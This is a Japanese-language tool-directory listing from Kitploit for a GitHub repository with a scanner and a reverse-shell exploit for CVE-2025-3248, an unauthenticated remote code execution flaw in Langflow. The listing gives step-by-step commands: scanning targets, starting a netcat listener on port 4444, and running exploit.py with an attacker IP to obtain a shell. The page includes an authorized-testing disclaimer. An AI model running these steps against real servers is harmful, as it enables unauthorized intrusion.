Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3248 | Kitploit
ツール/GitHubGitHub/r0otk3r/cve-2025-3248
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-3248: Langflow の未認証リモートコード実行(RCE)

このリポジトリには2つの Python スクリプトが含まれています:

  • LangflowCheck.py: CVE-2025-3248 に脆弱な Langflow AI インスタンスをチェックするスキャナです。
  • exploit.py: 脆弱な Langflow ターゲットに対する動作するリバースシェルエクスプロイトです。

概要

CVE-2025-3248 は Langflow AI における重大な脆弱性で、未認証の攻撃者が /api/v1/validate/code への巧妙に細工されたペイロードを介して、リモートで任意の Python コードを実行できるようにします。


ファイル

LangflowCheck.py

  • /etc/passwd を読み取る無害なペイロードの実行を試みることで、ターゲットが脆弱かどうかをチェックします。
  • 単一のターゲットまたは URL のリストをスキャンできます。
  • 脆弱なターゲットをファイルに出力することをサポートします。

exploit.py

  • 脆弱なエンドポイントにリバースシェルペイロードを送信します。
  • 攻撃者の IP(lhost)とリスナーポート(lport)が必要です。
  • アクティビティを exploit.log に記録します。
  • ペイロード送信前のリスナーチェックをサポートします。

使用方法

1. 依存関係のインストール

root@kitploit:~
pip install -r requirements.txt

2. 脆弱性スキャナの実行

単一 URL

root@kitploit:~
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

1

複数ターゲット

root@kitploit:~
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

tt

3. ターゲットの悪用

まず、リスナーを起動します

root@kitploit:~
sudo nc -nvlp 4444

l

次に、エクスプロイトを実行します:

root@kitploit:~
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

2

ターゲットが脆弱な場合、シェルが取得できるはずです。 root

⚠️ 免責事項

このエクスプロイトは教育目的および許可を得たセキュリティテスト専用です。所有していない、または明示的なテスト許可がないシステムに対して使用しないでください。


公式チャンネル

  • YouTube @rootctf
  • X @r0otk3r
ツールをダウンロード